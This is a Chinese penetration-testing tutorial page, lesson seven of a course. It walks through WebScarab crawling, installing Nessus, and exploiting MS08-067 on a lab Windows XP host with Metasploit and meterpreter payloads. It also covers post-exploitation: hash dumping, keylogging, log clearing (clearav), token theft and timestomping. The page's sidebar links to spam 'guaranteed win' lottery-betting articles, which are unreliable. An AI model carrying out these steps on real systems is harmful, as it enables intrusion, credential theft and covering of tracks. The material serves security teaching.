ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → 渗透测试与漏洞利用系列课程【第七课】

渗透测试与漏洞利用系列课程【第七课】

时间:2018-04-14 07:00:22人气:作者:本站作者我要评论

渗透测试与漏洞利用系列课程【第七课】

渗透测试实践

信息收集

部分内容被隐藏
需登陆后可查看

webscarab

webscarab :web爬行 / 目录爆破 / xss测试等。简单做爬虫演示:

打开proxy选项卡中的listener选项卡配置代理端口,IP地址填127.0.0.1,点击start开启代理服务

渗透测试与漏洞利用系列课程【第七课】

打开浏览器,设置代理服务器为127.0.0.1端口为自己在webscarab中设置的端口

渗透测试与漏洞利用系列课程【第七课】

配置好代理后,在浏览器中访问目标网站,然后打开webscarabspider选项卡,选择起始点的请求(目标站点),点击Fecth Tree就可以在messages选项卡中看到请求信息:

渗透测试与漏洞利用系列课程【第七课】

在spider窗格中双击自己目标站点前的文件夹图标就可以查看爬到的目录以及文件

渗透测试与漏洞利用系列课程【第七课】

扫描

Nessus号称是世界上最流行的漏洞扫描程序,提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。

安装Nessus工具

为了顺利的使用Nessus工具,则必须要将该工具安装在系统中。Nessus工具不仅可以在电脑上使用,而且还可以在手机上使用。本节将介绍在不同操作系统平台及手机上安装Nessus工具的方法。

  1. 获取Nessus安装包Nessus的官方下载地址是:http://www.tenable.com/products/nessus/select-your-operating-system

    选择Nessus Home,进行下载

    Home家庭版 / 免费 --- Professional专业版 / 付费

  2. 获取激活码输入以下地址: http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code

    单击 Nessus Home Free下面的 Register Now---填写信息 -- Register --- 邮箱收到激活码

  3. Nessus工具在Kali Linux下安装
    • 从官网上下载安装包。本例中下载的安装包文件名为Nessus-6.6.2-debian6_i386.deb
    • 安装命令:dpkg |I Nessus-6.6.2-debian6_i386.deb
    • 启动Nessus:/etc/init.d/nessusd start
    • 打开浏览器,输入网址:https://127.0.0.1:8834

    第一次登陆,会有风险提示,选择“我知道风险”的选项,确认

    手动更新Nessus,即在控制台中,运行命令:/opt/nessus/sbin/nessuscli update --plugins-only

    完成更新后,重新启动Nessus,即使用命令:/etc/init.d/nessusd restart

Nessus扫描

----挺简单的,自己试试就好了

漏洞利用

xp存在 MS08-067的漏洞,用 msfconsole中的 search命令查找该漏洞的渗透攻击模块:


msf > search MS08-067
Maching Modules
=================
NameDisclosure Date Rank Description
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corrupyion

然后用use命令选用该模块、并使用show options来查看选项:


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

optionsRHOST没有被设置 -- 用 set进行设置


msf exploit(ms08_067_netapi) > set RHOST 192.168.32.131

利用exploit命令进行利用:


msf exploit(ms08_067_netapi) > exploit

利用后,可以看到XP系统中出现 -- svchost.exe --应用程序错误

以上仅仅使用了模块重现了溢出漏洞。

如果使用攻击载荷,则可以对目标系统实施更进一步的攻击,比如植入木马,获取目标主机的控制权等。在使用该模块后,可以使用show payloads指令来查看所有的攻击载荷:


msf exploit(ms08_067_netapi) > show payloads

可以看到很多的攻击载荷,常见载荷有:

  • reverse_tcp:path : payload/windows/meterpreter/reverse_tcp,反向连接shell,使用起来很稳定。需要设置LHOST
  • bind_tcp:path : payload/windows/meterpreter/bind_tcp,正向连接shell。需要设置RHOST

我们设置该攻击载荷:set payload windows/meterpreter/bind_tcp --- show options -- 设置RHOSTset RHOST 192.168.32.131

show targets查看可选的目标操作系统类型,选择合适的目标操作系统 --- 设置版本号 set target 34

然后就可以 exploit 啦 -- 利用成功,进入meterpreter

事实上,在利用exploit进行漏洞利用前,可以check查看目标机是否可攻击, 渗透成功后,会返回meterpreter shell

后渗透攻击

挖掘用户名和密码

微软Windows系统存储哈希值的方式一般为LAN Manger(LM)、NT LAN Manger(NTLM),或NT LAN Manger v2(NTLMv2)

部分内容被隐藏
需登陆后可查看

渗透测试与漏洞利用系列课程【第七课】

例如,UID为500的Administrator用户密码的哈希值如下。其中第一个哈希是LM哈希值,第二个则是NTLM哈希值

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

得到这些 HASH 值之后,可以利用工具对 HASH 值暴力破解,得到明文 or 在一些渗透脚本中,以HASH值作为输入,完成对目标主机的登录。

获取控制权

利用shell命令可以获得目标主机的控制台,有了控制台,就可以对目标系统进行任意文件操作,也可以执行各类DOS命令。

具体的Meterpreter命令如下:

命令 含义
核心命令
? 帮助菜单
background 将当前会话移动到背景
bgkill 杀死一个背景 meterpreter 脚本
bglist 提供所有正在运行的后台脚本的列表
bgrun 作为一个后台线程运行脚本
channel 显示活动频道
close 关闭通道
exit 终止 meterpreter 会话
help 帮助菜单
interact 与通道进行交互
irb 进入 Ruby 脚本模式
migrate 移动到一个指定的 PID 的活动进程
quit 终止 meterpreter 会话
read 从通道读取数据
run 执行以后它选定的 meterpreter 脚本
use 加载 meterpreter 的扩展
write 将数据写入到一个通道
文件系统命令
cat 读取并输出到标准输出文件的内容
cd 更改目录对受害人
del 删除文件对受害人
download 从受害者系统文件下载
edit 用 vim编辑文件
getlwd 打印本地目录
getwd 打印工作目录
lcd 更改本地目录
lpwd 打印本地目录
ls 列出在当前目录中的文件列表
mkdir 在受害者系统上的创建目录
pwd 输出工作目录
rm 删除文件
rmdir 受害者系统上删除目录
upload 从攻击者的系统往受害者系统上传文件
网络命令
ipconfig 显示网络接口的关键信息,包括 IP 地址等
portfwd 端口转发
route 查看或修改受害者路由表
系统命令
clearav 清除了受害者的计算机上的事件日志
drop_token 被盗的令牌
execute 执行命令
getpid 获取当前进程 ID (PID)
getprivs 尽可能获取尽可能多的特权
getuid 获取作为运行服务器的用户
kill 终止指定 PID 的进程
ps 列出正在运行的进程
reboot 重新启动受害人的计算机
reg 与受害人的注册表进行交互
rev2self 在受害者机器上调用 RevertToSelf()
shell 在受害者计算机上打开一个shell
shutdown 关闭了受害者的计算机
steal_token 试图窃取指定的 (PID) 进程的令牌
sysinfo 获取有关受害者计算机操作系统和名称等的详细信息
用户界面命令
enumdesktops 列出所有可访问台式机
getdesktop 获取当前的 meterpreter 桌面
idletime 检查长时间以来,受害者系统空闲进程
keyscan_dump 键盘记录软件的内容转储
keyscan_start 启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop 停止键盘记录软件
screenshot 抓去 meterpreter 桌面的屏幕截图
set_desktop 更改 meterpreter 桌面
uictl 启用用户界面组件的一些控件
特权升级命令
getsystem 获得系统管理员权限
密码转储命令
hashdump 抓去哈希密码 (SAM) 文件中的值
Timestomp 命令
timestomp 操作修改,访问,并创建一个文件的属性

相关文章

猜你喜欢

  • 深入解析浅谈《快3单双准确率方法》成功方案

    2022-09-28 /

  • 全网首发《快3单双大小必中方法技巧》思路汇总

    2022-09-28 /

  • 资深攻略《快3大小必中技巧》上岸方法

    2022-09-28 /

  • 【最准确的玩法】《回血上岸计划导师QQ》操作系列

    2022-09-28 /

  • 经验教程《导师一分快三计划》最新窍门

    2022-09-28 /

  • 高手教你《大小单双最安全的打法》三期必中

    2022-09-28 /

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网